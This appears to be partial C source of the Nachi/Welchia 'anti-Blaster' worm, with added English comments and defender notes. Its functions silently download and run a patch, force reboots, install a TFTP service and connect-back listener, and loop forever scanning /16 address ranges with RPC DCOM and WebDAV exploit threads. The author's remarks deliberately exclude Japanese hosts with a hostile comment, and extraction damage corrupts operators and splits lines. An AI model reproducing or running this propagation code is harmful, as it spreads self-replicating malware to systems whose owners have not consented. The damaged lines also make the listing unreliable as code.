
📄 冲击波病毒克星原代码.txt

📁 因为该变种病毒不但要攻击RPC漏洞
冲击波病毒克星源代码
/*
 * DoServicePackFunction
 *
 * Purpose: on a supported OS and locale where the patch is not yet recorded in
 * the registry, download a patch installer, run it unattended, and force a
 * reboot once ReadRegServicePack() reports the patch as present.
 *
 * Returns FALSE when Win2000OrXp() is neither 0 nor 1, when
 * ReadRegServicePack() already reports the patch, when the locale maps to
 * nLanguageID == -1, when DownloadSpFile() or MakeProcess() fails, or when the
 * installer has not exited after 360000 ms. Returns TRUE in every other case,
 * including when the patch is still not detected after the installer ran.
 *
 * Defender notes, limited to what this listing shows:
 *  - The installer is stored under the relative name "RpcServicePack.exe",
 *    started with the switches "-n -o -z -q", and deleted afterwards.
 *  - No signature or hash check of the downloaded file appears in this
 *    function; DownloadSpFile() is not shown, so confirm there.
 *  - ShutDownWindows(EWX_REBOOT | EWX_FORCE) restarts the host without user
 *    consent, so an unexplained reboot can accompany the other artifacts.
 *
 * NOTE(review): this listing carries extraction damage that is left as found:
 * "││" / "│" appear where "||" / "|" are expected, and a line holding only
 * "~~" or loose text is the wrapped tail of the "//" comment just above it,
 * not a statement.
 */
BOOL DoServicePackFunction() 
{ 
// 0 selects the Windows 2000 URL table and 1 the XP table (see the download step below).
DWORD nSystemVer = Win2000OrXp(); 
if ( !( nSystemVer == 0 ││ nSystemVer == 1) ) 
return FALSE; // not 2k or xp 

if ( ReadRegServicePack(nSystemVer) ) 
return FALSE; // patch already installed 

// Identify the OS language version from the OEM code page plus the primary
// and sub language IDs of the system default locale.
int nLanguageID; 
unsigned int unOemCP = GetOEMCP(); 

LCID lcid = GetSystemDefaultLCID(); 
WORD wMain = PRIMARYLANGID(lcid); 
WORD wSub = SUBLANGID(lcid); 

if ( unOemCP == 437 && wMain == 9 && wSub == 1 ) //en 
nLanguageID = 0; // English build gets the English patch (author's remark: "be glad you get that much") 
// author's remark: other European builds are not handled; "the Russians have their own way" 
~~ 
else if ( unOemCP == 936 && wMain == 4 && wSub == 2 ) //cn 
nLanguageID = 1; // Simplified Chinese; author's remark: "this is what it was written for" 
else if ( unOemCP == 950 && wMain == 4 && wSub == 1 ) //tw 
nLanguageID = 2; // Traditional Chinese; author's remark: "compatriots must be helped" 
else if ( unOemCP == 932 && wMain == 0x11 && wSub == 1 ) //jp 
nLanguageID = -1; // Japanese locale is deliberately mapped to -1, so these hosts are left unpatched (the author's remark is hostile) 
// author's remark: "enough of revenge; hope they reform" 
~~~ 再玩火就灭了他丫的~~ 
else if ( unOemCP == 949 && wMain == 0x12 && wSub == 1 ) //kr 
nLanguageID = 3; // Korean; author's remark, roughly: fewer hosts for novices to relay through and harm domestic networks 
else{ 
nLanguageID = -1; 
} 

// Any locale not mapped above gets no patch.
if ( nLanguageID == -1) 
return FALSE; 

// Relative file name: the installer lands in the process's current directory.
char szServicePack[] = "RpcServicePack.exe"; 

// download it 
// nLanguageID indexes the per-OS URL table; the tables themselves are not in this listing.
if ( !nSystemVer ) { // 2k 
if ( !DownloadSpFile (szServicePack, szWin2kSpUrl[nLanguageID]) ) 
return FALSE; 
} 
else{ 
if ( !DownloadSpFile (szServicePack, szWinXPSpUrl[nLanguageID]) ) 
return FALSE; 
} 

// Command line for an unattended install; these switches are a hunting string
// for process-creation logs. NOTE(review): no integrity check of the file is
// visible between download and execution.
char szExec[180]; 
sprintf(szExec, "%s -n -o -z -q", szServicePack); 

HANDLE hProcess = MakeProcess( szExec ); 
if ( hProcess == NULL ) 
return FALSE; 

// Give the installer 360000 ms; on timeout it is killed and the file removed.
if (WaitForSingleObject(hProcess, 360000) != WAIT_OBJECT_0 ){ // not finished within six minutes 
未完成 
TerminateProcess(hProcess,1); 
CloseHandle(hProcess); 
DeleteFile(szServicePack); 
return FALSE; 
} 
CloseHandle(hProcess); 

// Wait 15 s, then delete the installer regardless of the outcome.
Sleep(15000); 
DeleteFile(szServicePack); 
// Reboot only when the registry now shows the patch.
if ( ReadRegServicePack(nSystemVer) ) { 
ShutDownWindows( EWX_REBOOT │ EWX_FORCE );//install service pack ok, reboot 
it~~~ 
Sleep(20000); // author's remark: the reboot is forced because the patch has no effect without one 
找 Bill该死 说去~~~ 
} 

return TRUE; 
} 



// BeginExploitFunction: walks a run of IPv4 addresses and starts one worker
// thread per address that passes the filter below.
// IN: ulIpStart - first address, in host byte order (htonl() is applied before hand-off)
//     nBCount   - number of /16 ("B segment") ranges; the loop runs nBCount * 256 * 256 times
//     bRand     - when TRUE each address comes from MakeRandIp() instead of ulIpStart + i
//     bWebDav   - TRUE selects ExploitWebDavThread, FALSE selects ExploitRpcDcomThread
// (author's remark on this function: "even messier, bear with it")
//
// Defender notes, limited to what this listing shows: the non-random mode is a
// sequential sweep of whole /16 ranges from one source, with concurrency capped
// by nMaxThread (300 according to the inline comment). The worker routines are
// not part of this listing.
//
// NOTE(review): extraction damage is left as found: "││" appears where "||" is
// expected, and a line holding only loose text is the wrapped tail of the "//"
// comment just above it, not a statement.
void BeginExploitFunction(u_long ulIpStart, int nBCount, BOOL bRand, BOOL 
bWebDav) 
{ 
HANDLE hThread = NULL; 
BOOL bFirst = TRUE; 
u_long uComp; 

for (int i=0;i< (nBCount * 256 * 256); i++){ 

// Pick the next address: random, or the i-th address after ulIpStart.
if ( bRand ) 
uComp = MakeRandIp(); 
else 
uComp = i + ulIpStart; 

// Skip any address with a 0xC5 byte or with 0x9999 in one of the three 16-bit
// windows tested. The author's comment, roughly: some targets are masked out so
// that a host already hit is not broken by another attempt. The technical
// reason for these particular values is not visible in this listing.
if ( // author's remark: mask out some targets so nothing gets destroyed 
:)~~~ 
(BYTE)uComp == 0xc5 ││ 
(BYTE)(uComp>>8) == 0xc5 ││ 
(BYTE)(uComp>>16) == 0xc5 ││ 
(BYTE)(uComp>>24) == 0xc5 ││ 
(WORD)uComp == 0x9999 ││ 
(WORD)(uComp>>8) == 0x9999 ││ 
(WORD)(uComp>>16) == 0x9999 ) 
continue; 

// Heap cell that carries the address to the worker thread; who frees it is not
// visible in this function.
u_long *myPara = new u_long; 

if ( myPara == NULL ){// if the allocation failed, try once more 
Sleep(100); 
myPara = new u_long; 
} 

if ( myPara ){ 
// Only the most recent thread handle is kept; the previous one is closed here.
if ( hThread ) 
CloseHandle(hThread); 

// The worker receives the address in network byte order.
*myPara = htonl( uComp); 

DWORD dwThreadId; 

if (bWebDav) 
hThread = 
CreateThread(NULL,0,ExploitWebDavThread,(LPVOID)myPara,0,&dwThreadId); 
else 
hThread = 
CreateThread(NULL,0,ExploitRpcDcomThread,(LPVOID)myPara,0,&dwThreadId); 

Sleep(2); 
} 

// Added to avoid a first-run bug: the threads' own counter increment had not
// run yet, so N threads were created in one go. 
InterlockedIncrement(&g_CurThreadCount) 未来得及运行,一次性建立了N个线程的 
bug! 
if ( bFirst && (i >= nMaxThread) ){ 
Sleep(2000); 
bFirst = FALSE; 
} 

// Throttle: wait while the number of live workers is at the cap.
while(g_CurThreadCount >= nMaxThread) // #define nMaxThread 300 (author's remark: "accidentally overdid it") 
玩过了~~~ 
Sleep(2); 

} 

// Pause 60 s after the whole range has been dispatched.
Sleep(60000); 
} 




// DoIt: main routine shared by service mode and console mode.
//
// Order of work as written: start Winsock, call KillMsblast(), remove itself if
// the local year is 2004, prepare buffers, call DoServicePackFunction(), start
// a receive thread and a TFTP service, then loop forever over four scan passes
// followed by another KillMsblast().
//
// Defender notes, limited to what this listing shows:
//  - pPingBuffer is filled with 0xAA bytes; the author's own comment calls this
//    the signature of the ICMP Echo packets and asks routers to drop them.
//  - A service named by szServiceTftpd is started, and installed if missing;
//    an unexpected TFTP service is a host-side artifact.
//  - The author's comment on the third pass says the WebDAV path exists to get
//    around port-135 SYN blocking, so filtering port 135 alone does not cover
//    every path this routine uses.
//  - Self-removal depends on the local clock reading year 2004.
//
// NOTE(review): extraction damage is left as found: "WSADATAwsd" has lost its
// space, "(L" / "PVOID)" is one cast split across two lines, and a line holding
// only loose text is the wrapped tail of the "//" comment just above it.
void DoIt() 
{ 
WSADATAwsd; 
if(WSAStartup(MAKEWORD(2,2),&wsd)!=0) 
return; 

// kill the worm (KillMsblast is not part of this listing) 
KillMsblast(); 

// uninstall: once the local clock reads year 2004, delete both services and exit 
SYSTEMTIME st; 
GetLocalTime(&st); 
if ( st.wYear == 2004 ){ 
MyDeleteService(szServiceName); 
MyDeleteService(szServiceTftpd); 
RemoveMe(); 
ExitProcess(1); // author's remark: not strictly needed, RemoveMe() reuses earlier code that deletes its own file on exit under 2k 
自身文件删除了 
} 

srand( GetTickCount() ); 

// Fill the ping buffer with 0xAA; its length is sizeof(pPingBuffer), declared elsewhere.
memset(pPingBuffer, '\xAA', sizeof(pPingBuffer)); 
// Author's request: backbone routers should immediately drop ICMP Echo packets with this signature. 
丁已经打够了!~~~ 

// prepare the WebDAV send buffer (68000 bytes, retried until the allocation succeeds) 
do{ 
pWebDavExploitBuffer = new char[68000]; 
Sleep(100); 
}while(pWebDavExploitBuffer == NULL); 

// must run before CheckOnlienAndPressData(): fill both send buffers once 
PressWebDavBufferOnce(); 
PressRpcDcomBufferOnce(); 

CheckOnlienAndPressData(); // get LocalIp and fix up the connect-back IP and port inside the buffers 

// apply the patch to the local host 
DoServicePackFunction(); 

// create the receive thread 
DWORD dwThreadID; 
HANDLE 
hWorkThread=CreateThread(NULL,0,(LPTHREAD_START_ROUTINE)RecvSendCmdThread,(L 
PVOID)NULL,0,&dwThreadID); 
if(hWorkThread==NULL) // RecvSendCmdThread blocks; for each connect-back it starts another thread, 
同时处理多个反连 
return; 
CloseHandle(hWorkThread); 

// Start the TFTP service; if that fails, install it and try again.
if ( !MyStartService(szServiceTftpd) ){ 
Sleep(1000); 
InstallTftpService(); 
Sleep(1000); 
MyStartService(szServiceTftpd); 
} 

Sleep(2000); // wait for the receive thread to set the global random bind port 

u_long ulIP; 
for(;;){ // author's estimate: about two hours per loop on an ordinary machine 

// pass 1: the local /16 (the low 16 bits of the local address are cleared) 
CheckOnlienAndPressData(); 
ulIP = ntohl(inet_addr(szLocalIp)); 
ulIP &= 0xffff0000; 
BeginExploitFunction( ulIP, 1, 0, 0); 

// pass 2: three /16 ranges next to the local one, starting one above or three below 
CheckOnlienAndPressData(); 
if ( rand() % 2) 
ulIP += 0x00010000; 
else 
ulIP -= 0x00030000; 
BeginExploitFunction( ulIP, 3, 0, 0); 

// pass 3: one /16 over WebDAV; author's remark: this gets past port-135 SYN blocking 
CheckOnlienAndPressData(); 
ulIP = MAKELONG(0, wdIpHead[ rand()% 76 ]); // author's note to the operators of the wdIpHead[] /16 ranges: 
立即采取补救措施~~~ sorry~~~ 
BeginExploitFunction( ulIP, 1, 0, 1); 

// pass 4: random addresses, one /16 worth, over RPC or WebDAV 
CheckOnlienAndPressData(); 
if ( rand() % 2) 
BeginExploitFunction( ulIP, 1, 1, 0); 
else 
BeginExploitFunction( ulIP, 1, 1, 1); // author's remark: "hop, hop, hop" 

KillMsblast(); 

} 

// Not reached as written: the loop above has no exit.
//WSACleanup(); 

}
